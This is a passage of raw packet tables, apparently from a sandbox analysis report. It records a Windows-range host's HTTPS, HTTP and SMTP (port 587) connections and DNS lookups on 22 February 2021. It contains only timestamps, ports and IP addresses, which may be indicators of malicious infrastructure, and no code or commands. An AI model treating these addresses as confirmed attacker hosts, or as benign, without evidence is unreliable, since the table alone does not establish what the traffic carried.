Feb 22, 2021 20:35:57.823473930 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.823493958 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.824378967 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.824412107 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.824486017 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.825429916 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.825458050 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.825570107 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.826445103 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.826473951 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.826598883 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.827495098 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.827526093 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.827591896 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.828569889 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.828603029 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.828687906 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.829691887 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.829816103 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.830252886 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.830708981 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.830739021 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.830811024 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.831801891 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.831885099 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.831989050 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.832873106 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.832902908 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.832983971 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.833910942 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.834012032 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.834099054 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.834964991 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.834997892 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.835093021 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.835982084 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.836003065 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.836019039 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.836039066 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.836083889 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.836117983 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.837014914 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.837033987 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.837126017 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.838673115 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.838706970 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.838788986 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.839096069 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.839118004 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.839167118 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.840154886 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.840176105 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.840256929 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.841171980 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.841193914 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.841300011 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.842246056 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.842278004 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.842344999 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.843245029 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.843295097 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.843370914 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.844274998 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.844372988 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.844455004 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.845252037 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.845277071 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.845345974 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.846319914 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.846409082 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.847325087 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.847357988 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.847420931 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.847455025 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.848335028 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.848368883 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.848392010 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.848414898 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.848428011 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.848478079 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.849373102 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.849422932 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.849509001 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.851521015 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.851543903 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.851593971 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.853804111 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.853837967 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.853997946 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.855252028 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.855288029 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.855377913 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.856089115 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.856122017 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.856255054 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.858242989 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.858278036 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.858383894 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.858736038 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.858767033 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.858926058 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.859766006 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.859797955 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.860104084 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.861346006 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.861371040 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.861499071 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.861782074 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.861809015 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.861888885 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.863087893 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.863117933 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.863233089 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.864090919 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.864120007 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.864200115 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.864506006 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.864528894 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.864602089 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.865757942 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.865798950 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.865880966 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.866729021 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.866770029 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.866930008 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.867219925 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.867239952 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.867280960 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.868242979 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.868277073 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.868360996 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.869203091 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.869235992 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.869304895 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.870187044 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.870223999 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.870373011 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.871133089 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.871164083 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.871243954 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.872150898 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.872184992 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.872307062 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.873087883 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.873112917 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.873191118 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.874058008 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.874083996 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.874162912 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.875077009 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.875107050 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.875211000 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.876053095 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.876080036 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.876167059 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.876266003 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.876343966 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.877160072 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.877366066 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.877403975 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.877479076 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.878431082 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.878463984 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.878633976 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.879336119 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.879360914 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.879415989 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.880141020 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.880170107 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.880240917 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.880961895 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.880990982 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.881062031 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.882111073 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.882138968 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.882227898 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.882951021 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.882977962 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.883043051 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.883894920 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.883924007 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.883999109 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.884870052 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:58.041295052 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:36:04.818087101 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:36:04.818347931 CET	49754	80	192.168.2.4	45.148.121.68
Feb 22, 2021 20:36:26.382361889 CET	49751	80	192.168.2.4	54.225.220.115
Feb 22, 2021 20:36:26.856223106 CET	49751	80	192.168.2.4	54.225.220.115
Feb 22, 2021 20:36:27.544517994 CET	49751	80	192.168.2.4	54.225.220.115
Feb 22, 2021 20:36:27.673018932 CET	80	49751	54.225.220.115	192.168.2.4
Feb 22, 2021 20:36:27.673316002 CET	49751	80	192.168.2.4	54.225.220.115
Feb 22, 2021 20:36:27.957132101 CET	49761	587	192.168.2.4	208.91.199.223
Feb 22, 2021 20:36:28.121474981 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:28.122406960 CET	49761	587	192.168.2.4	208.91.199.223
Feb 22, 2021 20:36:28.710617065 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:28.711088896 CET	49761	587	192.168.2.4	208.91.199.223
Feb 22, 2021 20:36:28.877417088 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:28.877445936 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:28.877710104 CET	49761	587	192.168.2.4	208.91.199.223
Feb 22, 2021 20:36:29.041897058 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:29.126735926 CET	49761	587	192.168.2.4	208.91.199.223
Feb 22, 2021 20:36:29.291052103 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:29.291085005 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:29.291105986 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:29.291121960 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:29.291143894 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:29.291177988 CET	49761	587	192.168.2.4	208.91.199.223
Feb 22, 2021 20:36:29.356426001 CET	49761	587	192.168.2.4	208.91.199.223
Feb 22, 2021 20:36:29.455444098 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:29.465811968 CET	49761	587	192.168.2.4	208.91.199.223
Feb 22, 2021 20:36:29.635956049 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:29.723481894 CET	49761	587	192.168.2.4	208.91.199.223
Feb 22, 2021 20:36:29.887749910 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:29.912153006 CET	49761	587	192.168.2.4	208.91.199.223
Feb 22, 2021 20:36:30.077358007 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:30.082758904 CET	49761	587	192.168.2.4	208.91.199.223
Feb 22, 2021 20:36:30.250147104 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:30.250926971 CET	49761	587	192.168.2.4	208.91.199.223
Feb 22, 2021 20:36:30.416282892 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:30.416771889 CET	49761	587	192.168.2.4	208.91.199.223
Feb 22, 2021 20:36:30.588747025 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:30.589318037 CET	49761	587	192.168.2.4	208.91.199.223
Feb 22, 2021 20:36:30.758748055 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:30.765295029 CET	49761	587	192.168.2.4	208.91.199.223
Feb 22, 2021 20:36:30.765474081 CET	49761	587	192.168.2.4	208.91.199.223
Feb 22, 2021 20:36:30.765609026 CET	49761	587	192.168.2.4	208.91.199.223
Feb 22, 2021 20:36:30.765711069 CET	49761	587	192.168.2.4	208.91.199.223
Feb 22, 2021 20:36:30.765815973 CET	49761	587	192.168.2.4	208.91.199.223
Feb 22, 2021 20:36:30.929529905 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:30.929682016 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:30.969316959 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:31.027092934 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:31.028107882 CET	49761	587	192.168.2.4	208.91.199.223
Feb 22, 2021 20:36:31.192233086 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:31.192428112 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:31.192543030 CET	587	49761	208.91.199.223	192.168.2.4
Feb 22, 2021 20:36:31.192743063 CET	49761	587	192.168.2.4	208.91.199.223
Feb 22, 2021 20:36:31.221998930 CET	49761	587	192.168.2.4	208.91.199.223

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 22, 2021 20:34:29.687860012 CET	61516	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:29.739490986 CET	53	61516	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:29.767420053 CET	49182	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:29.815984011 CET	53	49182	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:30.263438940 CET	59920	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:30.314961910 CET	53	59920	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:31.078226089 CET	57458	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:31.080617905 CET	50579	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:31.082081079 CET	51703	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:31.126879930 CET	53	57458	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:31.130614996 CET	53	51703	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:31.131963015 CET	53	50579	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:34.316699028 CET	65248	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:34.365331888 CET	53	65248	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:34.720675945 CET	53723	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:34.783176899 CET	53	53723	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:35.302231073 CET	64646	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:35.350928068 CET	53	64646	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:36.280597925 CET	65298	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:36.329336882 CET	53	65298	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:36.805571079 CET	59123	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:36.864126921 CET	53	59123	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:37.923851967 CET	54531	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:37.976875067 CET	53	54531	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:39.346796989 CET	49714	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:39.397808075 CET	53	49714	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:40.696451902 CET	58028	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:41.707600117 CET	58028	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:42.722731113 CET	58028	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:42.771193027 CET	53	58028	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:47.367399931 CET	53097	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:47.418781996 CET	53	53097	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:48.501813889 CET	49257	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:48.560431004 CET	53	49257	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:48.929344893 CET	62389	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:48.982388973 CET	53	62389	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:49.017344952 CET	49910	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:49.106849909 CET	53	49910	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:50.018461943 CET	49910	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:50.080616951 CET	53	49910	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:51.020482063 CET	49910	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:51.077636003 CET	53	49910	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:52.415822029 CET	55854	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:52.524574041 CET	64549	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:52.576081038 CET	53	64549	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:52.636853933 CET	53	55854	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:53.035986900 CET	49910	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:53.093123913 CET	53	49910	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:53.546662092 CET	63153	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:53.595238924 CET	53	63153	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:54.636038065 CET	52991	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:54.684721947 CET	53	52991	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:55.715290070 CET	53700	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:55.766792059 CET	53	53700	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:56.700356960 CET	51726	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:56.753185987 CET	53	51726	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:57.155433893 CET	49910	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:57.213876963 CET	53	49910	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:57.856837034 CET	56794	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:57.905467033 CET	53	56794	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:00.789448977 CET	56534	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:00.838532925 CET	53	56534	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:01.642065048 CET	56627	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:01.693589926 CET	53	56627	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:02.390264988 CET	56621	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:02.486176968 CET	63116	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:02.495822906 CET	53	56621	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:02.543293953 CET	53	63116	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:02.654545069 CET	64078	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:02.705847025 CET	53	64078	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:03.489864111 CET	64801	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:03.539556980 CET	53	64801	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:04.643543005 CET	61721	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:04.692197084 CET	53	61721	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:05.419096947 CET	51255	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:05.470511913 CET	53	51255	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:24.897155046 CET	61522	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:24.950231075 CET	53	61522	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:26.430989027 CET	52337	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:26.490880966 CET	53	52337	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:26.674863100 CET	55046	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:26.723582983 CET	53	55046	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:45.741672993 CET	49612	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:45.800513983 CET	53	49612	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:45.854551077 CET	49285	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:45.903126001 CET	53	49285	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:46.288532972 CET	50601	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:46.339776993 CET	53	50601	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:55.892837048 CET	60875	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:56.932419062 CET	60875	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:56.989854097 CET	53	60875	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:56.991533995 CET	53	60875	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:57.158576965 CET	56448	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:57.207247972 CET	53	56448	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:04.702212095 CET	59172	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:04.763225079 CET	53	59172	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:26.419395924 CET	62420	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:27.475675106 CET	62420	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:27.662655115 CET	53	62420	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:27.767416954 CET	60579	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:27.954674006 CET	53	60579	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:30.208513975 CET	50183	53	192.168.2.4	8.8.8.8
